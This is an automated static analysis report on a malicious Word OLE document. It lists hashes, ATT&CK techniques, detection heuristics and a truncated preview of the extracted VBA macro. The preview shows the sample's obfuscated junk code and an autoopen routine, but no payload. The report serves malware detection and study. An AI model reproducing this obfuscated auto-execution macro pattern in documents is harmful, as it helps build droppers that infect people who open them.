Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 dda9dc159876d3ee…

MALICIOUS

Office (OLE)

Size: 212.0 KB
Created: 2019-04-05 05:46:00
Authoring application: Microsoft Office Word
First seen: 2019-04-18
MD5: c5ef2f6f9a716d801efaa28f7c927f07
SHA-1: 7100aa29136b846f0d9bbe73d1ddd032a3e8d58b
SHA-256: dda9dc159876d3ee1d46041fd8ee1582a650d3ff723180b8d5381d830a589cd5
Risk Score: 222

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1203 Exploitation for Client Execution

The sample is a malicious OLE document containing a legacy WordBasic auto-executing macro named 'autoopen'. This macro utilizes a GetObject call, indicating an attempt to execute a payload. The presence of obfuscated VBA code further suggests malicious intent, likely to download and execute a second-stage payload.

Heuristics (7)

  • ClamAV: Doc.Malware.Sagent-6931999-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Sagent-6931999-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call [high] OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 30536 bytes
SHA-256: 120506c938897b10c1a5966a3814d4ffdffc43cae6a70881f7659e3c815cdfa6

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "jAA1B4Gx"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "mAoxDcA"
Attribute VB_Base = "0{99CEE0DB-9565-410A-A315-B2EC9FD8B6D7}{3BB24D2E-7F7F-48E5-892D-843F9F9BEA4A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "zccQAG"
Attribute VB_Base = "0{96F632E8-7CCF-4CD3-A7CF-2B3CE4F4DC71}{5C974C69-93BD-47F7-BF2C-6AD6CB4D79EA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "tAQcAGC"
Function MwCwAZ()
   If 132231733 = 538339903 Then
      Do While kxA_cZ < zABGUoA
      loxQ4Q = Cos(356794433) + 979331288
      fDZx_cA = CDate(515139391) + Cos(392143804)
      VAD1AGAU = 430379750 + Round(401638555)
      Loop
      jD_Ukxo = Rnd(737895602)
      Set bXAUQC = hAkUA_X
End If
   If 278275960 = 226707311 Then
      Do While kAADBAkw < O4QGUU
      KAADkUAZ = CByte(454023400) + 787133190
      OBQUoDCB = Log(541820776) + Log(239011391)
      kQADUUAx = 877146738 + Int(350849917)
      Loop
      iAXAAAZc = CByte(754384999)
      Set Bc1UDBk = mCADUGAA
End If
   If 654107779 = 893930709 Then
      Do While FAUAAAAx < MAXUAUDA
      vcGAwxDA = Oct(998611496) + 79376968
      XAX1AD = Sin(973966068) + CSng(359513257)
      qGA1QDBA = 691085569 + Sin(130574638)
      Loop
      iUCwZAo = Cos(263607702)
      Set cABAGU = RCUAQQc
End If
End Function
Sub autoopen()
IAABcoAA
End Sub
Function JZkDDA()
   If 142346240 = 27270177 Then
      Do While hXDUAAB < YAAAABA
      PAZAw11 = CInt(379839980) + 848615530
      CoAUB1AA = Sqr(894407513) + Rnd(82297737)
      Y1QQAA = 145372090 + Atn(735089169)
      Loop
      aCAAAD = Tan(745688683)
      Set JZQBBAZ = DUADAcU
End If
   If 731689416 = 561202822 Then
      Do While jwxkBG4B < zGZkUQD
      KGDAAoX = CDate(769570690) + 74635455
      S4AAD_AA = Sqr(117432543) + Fix(835652479)
      zQCGZG = 87813025 + CDate(14089991)
      Loop
      dUwDQBQ = Sin(719459528)
      Set XBAAA_ = MZAUoA
End If
   If 870416164 = 775209818 Then
      Do While pAAA_c < z_CxAw
      lZAkA_ = Tan(694486308) + 70595562
      KUGQ4_C = CLng(712179658) + CDbl(520347273)
      wUoAkQA = 282815557 + Int(722703533)
      Loop
      bAAAADA = Sqr(487365216)
      Set PAAQUcx = lAXABw
End If
End Function

Attribute VB_Name = "LUGQADA4"
Function EoABBQ4()
   If 829201740 = 54154337 Then
      Do While wwAX4Q < MAAU4ZDU
      OA4DCU = CDbl(591588611) + 273626962
      rAA11UU_ = Round(8547486) + Cos(865046552)
      RZBAkwZ = 617399200 + Atn(770341347)
      Loop
      f1UxxZA = CDbl(402955983)
      Set W1QGCAA = RA4o1AAw
End If
   If 761644374 = 943734569 Then
      Do While zAAGAx < lABAAAD
      XGBQoA = CByte(35328566) + 409170261
      SDooADQx = CDate(733734919) + CBool(339767733)
      FAUDZQk = 649687618 + Cos(300153811)
      Loop
      YAcAAxBZ = Tan(370050852)
      Set oAADGZ_A = owDCAAo
End If
   If 627576388 = 718146267 Then
      Do While SQAAUBBA < IoQ1QAGA
      ToBxBAUA = Tan(512418196) + 309403022
      L_kAAQ1A = Atn(442546105) + Hex(101301303)
      ZDAA1AA = 568528882 + Int(195880229)
      Loop
      vox_D_C = Sqr(299365527)
      Set EUQDGGA = tAw_AAxA
End If
End Function
Function IAABcoAA()
On Error Resume Next
   If 213639972 = 891335028 Then
      Do While wQAkAD < TCDxwB
      vZoAxA = Rnd(662752901) + 549525863
      oAXkZA = Hex(759109034) + Rnd(66956956)
      JooAACA = 131032685 + CSng(632887159)
      Loop
      lxAkQCGB = CSng(255178368)
      Set KB4DAAcA = jBkUAA
End If
   If 691721
... (truncated)